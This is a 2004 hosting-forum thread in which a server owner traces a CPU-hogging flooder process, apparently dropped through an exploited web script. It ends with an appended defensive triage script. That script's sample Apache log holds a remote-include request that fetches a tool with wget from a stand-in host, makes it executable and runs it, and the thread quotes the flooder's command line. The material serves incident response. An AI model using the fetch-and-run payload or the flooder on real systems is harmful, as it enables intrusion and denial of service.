BlaZingPenguin
10-23-2004, 03:33 PM
Hi, I just found out my CPU usage just went up really high, and I have this running, but I don't know what it is since it says nobody.
User Domain %CPU %MEM Mysql Processes
nobody 78.74 0.28 0.0
Top Process %CPU 76.5 [httpd]
Top Process %CPU 76.4 [httpd]
Top Process %CPU 76.3 [httpd]
I don't think that's my normal httpd server, yet I'm not sure, and since it says nobody could it be email or something? Should I go ahead and kill this?
EDIT
I get this through cPanel:
Pid Owner Priority Cpu % Mem % Command
26260 nobody 0 79.0 0.1 [httpd]
All of a sudden it changed to:
Pid Owner Priority Cpu % Mem % Command
27672 nobody 0 53.5 0.0 ./d64.225.154.34064.225.154.1
Process 27672 attached - interrupt to quit
send(4, "0123456789", 10, 0) = 10
send(4, "0123456789", 10, 0) = 10
send(4, "0123456789", 10, 0) = 10
Just keeps going.
*Shakes head*
I'm getting other stuff now.
Pid Owner Priority Cpu % Mem % Command
27950 root 0 26.4 0.0 strace-p27672
27806 root 0 6.4 0.2 whostmgrd - serving 24.69.255.246
27672 nobody 0 5.0 0.0 ./d64.225.154.34064.225.154.1
BlaZingPenguin
10-23-2004, 04:16 PM
Man, my usual PHP scripts, the ones that are at 0.050 execution time, are up to .200.
Also I can't kill this process.
PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
27672 nobody 19 0 428 428 372 R 53.1 0.0 10:00 0 d
BlaZingPenguin
10-23-2004, 04:49 PM
Problem solved.
I took a guess and made some tweaks, then took a big guess and banned ./d "64.225.154.34" 0 "64.225.154.1"
If anyone knows what this is, please let me know.
BlaZingPenguin
10-23-2004, 05:04 PM
Sorry to post again, but I'm still having a problem with this, just not as bad now.
I can't seem to kill this. I do top, then k 27672 and y, or kill 27672, and I'm having no luck with some strange file called d.
The top things I have to deal with are:
PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND
2203 root 14 0 452 448 380 R 56.6 0.0 3:21 0 strace
2192 root 12 0 6876 6876 6220 S 18.2 0.6 0:51 0 cpsrvd
27672 nobody 11 0 428 428 372 T 14.4 0.0 21:40 0 d
BlaZingPenguin
10-24-2004, 05:29 PM
I'm going to bump this; I still have this nasty little app running and I get these messages all the time.
IMPORTANT: Do not ignore this email.
This is cPanel stats runner on fireball.1337age.com!
While processing the log files for user mushir, the cpu has been
maxed out for more than a 6 hour period. The current load/uptime line on the server at the time of
this email is
13:55:49 up 95 days, 21:21, 0 users, load average: 1.75, 1.79, 1.77
Steven
10-24-2004, 05:44 PM
Bro, it looks like your server is hacked.
./d "64.225.154.34" 0 "64.225.154.1"
looks like a script used to flood things. It also should not be running as nobody.
BlaZingPenguin
10-24-2004, 05:56 PM
Any ideas on how they got in, etc., and why it only eats CPU and no memory whatsoever?
Steven
10-24-2004, 05:57 PM
Since it's running as nobody I am guessing you have some scripts on your server that were exploited. It's very common to see flooders using only CPU. What kernel version are you running? They could have even rooted you; in that case I would recommend getting an OS reinstall and securing the box properly the first time.
BlaZingPenguin
10-24-2004, 06:03 PM
Could I possibly talk to you on MSN or AIM for 5 mins?
BlaZingPenguin
10-24-2004, 06:13 PM
What if I hired you for an hour or two's work?
BlaZingPenguin
10-24-2004, 08:45 PM
I found the bastard; it's been chmodded and is green in the shell.
It was in /tmp.
This is all that shows up in tmp. Should I just do a rm -r on this file?
./
../
cmdtemp
cpanel.TMP.EbC4lHzok9m_P6v4
cpanel.TMP.T2lZxD2xkx8k4VLs
d*
dementri-session-0.353570155191363
.egg2
ffw-session-0.962469359018968
lost+found/
michael-session-0.834318560172932
mysql.sock@
nobody-session-0.855426529745699
pdnick-session-0.842975735056342
rep-session-0.102435587064491
sess_01aba3abe2b58792f9be395ba067ceac
sess_05c9d31f55b7389bd2e9ec0f26e05d19
sess_0650b277df6330fba3687a3e0d286307
sess_07e94cba60640daf23de57f1b4be7645
sess_0bb530f067fad2cbe5d2fca8ef992f8e
sess_0c7b19d426bdfe4209c25bc2a5a2bddf
sess_21086d1079a73d83bd8574e7bfd25353
sess_219252fdfaab7cec8d0052c283c76b6d
sess_2dfac0e3f7d4a5d680fdc714539035e2
sess_3fd8795c94b486d3efac94efedb4fc32
sess_405f2f5ed1f4bb1522234810db269ead
sess_4a1f6423b6e7633e93255dc318260208
sess_4f27befe7ac7eaf8116ba082da8092b7
sess_5e7171110a88ebb9bc541a10fc3353d0
sess_6671500920a1ca97370b10536a783e58
sess_6c831ab8dfab1792ca0c5514f64e0e12
sess_7c4986752ef9cc70d5279d2c6688dccd
sess_841fb8db6128645902b942cd5fdc11eb
sess_858b8878987eace87bb5e96b02719a0a
sess_898fd2ca612eb135a7b98f4d004ccc3b
sess_8d0abfd9265b90cf3029ca23c3b25672
sess_96ca4127c687c94ac9015eecf48f9b84
sess_b26c66baab42567d8f07382d56b3df01
sess_bde926e6f4d821981aff937bc14e454d
sess_c6ae27a52ce617c7a534c23f01c3e203
sess_d2e0785c131e73801b3212e703f7cc86
sess_d4a08300b2971c8bd68ce2bc31bac03a
sess_dba0d922fbf943fa584d0a1dea20e775
sess_e02bb3c3158ff4d3c21646b10e61f673
sess_e851db7990b8c2cdddfaad357b5f585e
sess_f78bcfffa95dc2ec250ea485ac37badf
sess_fb60a803030c3386b97e014040afca4b
shadoz-session-0.669295548551844
.s.PGSQL.5432=
.s.PGSQL.5432.lock
thisshou-session-0.965189843761863
xpm.h
zol-session-0.339349759134592
BlaZingPenguin
10-24-2004, 09:17 PM
OH My!
It's gone for now; thanks to those who replied or PMed me.
Steven
10-24-2004, 09:41 PM
It will be back if you don't find the cause of it. Don't forget to check:
/var/tmp
/tmp
/dev/shm
/usr/local/apache/proxy
/var/spool/mail
/var/spool/vbox
which are other common hiding places. Also do this:
cd /usr/local/apache/domlogs
grep "wget" *
to try to find the "exploited" website.
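The checks in the reply above, as an added example that is not part of the thread (my script, not anything the posters ran): it lists executables sitting in the drop directories named above, lists live processes whose binary lives in one of them, and greps the domlogs for the request that fetched the tool. It assumes Linux with /proc and cPanel's per-vhost domlogs in Apache combined format; the vhost names, log lines and the fake drop directory at the bottom are constructed sample data, and the grep pattern is widened beyond the reply's "wget" to the other fetchers typically used in PHP include exploits.

```sh
#!/bin/sh
# Added example (my code, not anything posted in the thread): triage script
# for the steps in the last reply plus a /proc check for processes running
# out of a drop directory. Assumptions: Linux /proc, cPanel domlogs in
# Apache combined format. The files created at the bottom are constructed
# sample data so the script runs stand-alone.

# Drop directories named in the thread as common hiding places.
HIDING_PLACES="/tmp /var/tmp /dev/shm /usr/local/apache/proxy /var/spool/mail /var/spool/vbox"

# Regular files with the owner-execute bit set in the given directories
# (default: HIDING_PLACES). PHP sess_* files, sockets and lock files are
# normal in /tmp; an executable like the thread's "d" is not.
find_dropped_executables() {
    [ $# -eq 0 ] && set -- $HIDING_PLACES
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f -perm -100 2>/dev/null
    done
    return 0
}

# Live processes whose binary lives in a drop directory, printed as
# "PID USER EXE". Reading another user's /proc/PID/exe link needs root.
running_from_drop_dirs() {
    for exe in /proc/[0-9]*/exe; do
        target=$(readlink "$exe" 2>/dev/null) || continue
        case "$target" in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                pid=${exe#/proc/}; pid=${pid%/exe}
                echo "$pid $(ps -o user= -p "$pid" 2>/dev/null || echo '?') $target" ;;
        esac
    done
    return 0
}

# Domlog lines that fetched something. The reply greps for "wget"; this
# widens the pattern to other fetchers seen in PHP include exploits.
# Output: "logfile: client-ip request-line".
FETCH_PATTERN='wget|curl|lynx|fetch'
find_exploited_sites() {
    logdir=${1:-/usr/local/apache/domlogs}
    for log in "$logdir"/*; do
        [ -f "$log" ] || continue
        grep -iE "$FETCH_PATTERN" "$log" 2>/dev/null |
            awk -v f="$(basename "$log")" \
                '{ req = $0; sub(/^[^"]*"/, "", req); sub(/".*$/, "", req); print f ": " $1 " " req }'
    done
    return 0
}

# --- constructed sample data (not real logs) ---------------------------------
SCRATCH=$(mktemp -d)
LOGS="$SCRATCH/domlogs"; DROP="$SCRATCH/tmp"
mkdir -p "$LOGS" "$DROP"
# Exploited vhost: a remote-include payload pulls a tool into /tmp and runs it.
cat > "$LOGS/victim.example.com" <<'EOF'
203.0.113.7 - - [23/Oct/2004:15:10:02 -0400] "GET /index.php?page=http://203.0.113.9/c.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.9/d;chmod%20755%20d;./d HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Oct/2004:15:10:40 -0400] "GET /index.php?page=http://203.0.113.9/c.txt?&cmd=ps%20x HTTP/1.1" 200 1100 "-" "Mozilla/4.0"
EOF
# Clean vhost: ordinary traffic only.
cat > "$LOGS/clean.example.com" <<'EOF'
198.51.100.4 - - [23/Oct/2004:15:11:00 -0400] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
# Fake drop directory: a PHP session file (expected) next to an executable "d" (not expected).
: > "$DROP/sess_01aba3abe2b58792f9be395ba067ceac"
printf '#!/bin/sh\n' > "$DROP/d"; chmod 755 "$DROP/d"

echo "== executables in drop dirs =="; find_dropped_executables "$DROP"
echo "== processes running from drop dirs =="; running_from_drop_dirs
echo "== fetch requests in domlogs =="; find_exploited_sites "$LOGS"
```

Run it as root so the /proc/PID/exe links resolve; on a real box call find_dropped_executables with no arguments so it walks all six directories. Two caveats that follow from the output posted earlier in the thread: the top listing shows the d process in state T while an strace -p is attached to it, and a ptrace-attached process is stopped at every syscall and receives any signal other than SIGKILL only when the tracer resumes it, so if a plain kill seems to do nothing, detach strace first or use kill -9, which cannot be intercepted. And removing the file from /tmp does not stop a running copy, since the binary is already mapped; kill the process, then remove the file, then find the request that dropped it, or it will come back.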